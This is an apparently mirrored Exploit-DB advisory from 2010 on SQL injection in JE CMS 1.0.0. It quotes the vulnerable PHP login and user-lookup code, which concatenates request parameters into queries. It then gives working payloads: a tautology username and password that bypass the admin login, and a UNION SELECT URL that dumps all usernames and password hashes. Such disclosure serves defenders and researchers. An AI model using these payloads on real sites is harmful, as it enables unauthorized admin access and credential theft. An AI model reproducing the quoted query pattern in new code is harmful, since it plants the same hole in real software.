JE CMS 1.0.0 – Authentication Bypass - 体验盒子

作者： Abysssec

日期： 2010-09-28

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15141/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

'''

________ __ ____

|\/|/ __ \ /\| || |_ \

| \/ | || | /\ | || | |_) |

| |\/| | || |/ /\ \| || |_ <

| || | |__| / ____ \ |__| | |_) |

|_||_|\____/_/\_\____/|____/

http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/

'''

Title: JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability

Affected Version : JE CMS <= 1.0.0

VendorSite : joenasejes.cz.cc

Discovery : abysssec.com

Vulnerabilites :

1. Bypass Authentication by SQL Injection Vulnerability

in administrator\login.php page, lines 16-20:

if (isset($_REQUEST['username'])) {

$username = $_REQUEST['username'];

$password = $_REQUEST['password'];

$result = $core->userLogin();

userLogin() function is in administrator\library\functions.php. in lines 129-139:

if ($userName == '' || $password == '') {

$errorMessage = JE_MISMATCH_USERNAME_PASSWORD;

}else {

// check the database and see if the username and password combo do match

$sql = "SELECT userid

FROM users

WHERE username = '".$userName."' // vulnerability is here

AND password = '".$this->getHash($password)."' // vulnerability is here

AND usertype = 1

AND block = 0";

$result = $this->JEQuery($sql);

POC:

in administrator/login.php:

username: admin' or '1'='1

password: admin' or '1'='1

2. SQL injection in administrator\index.php on "userid" parameter:

in administrator\index.php file line 12:

$userid = $_REQUEST['userid'];

lines 52-53:

case 'edituser' :

$user = $core->getUser($userid);

getUser function is in administrator\library\functions.php file. lines 578-583:

function getUser($id){

$sql = "SELECT *

FROM users

WHERE userid = ".$id; // vulnerability is here

$result = $this->JEQuery($sql);

POC:

http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--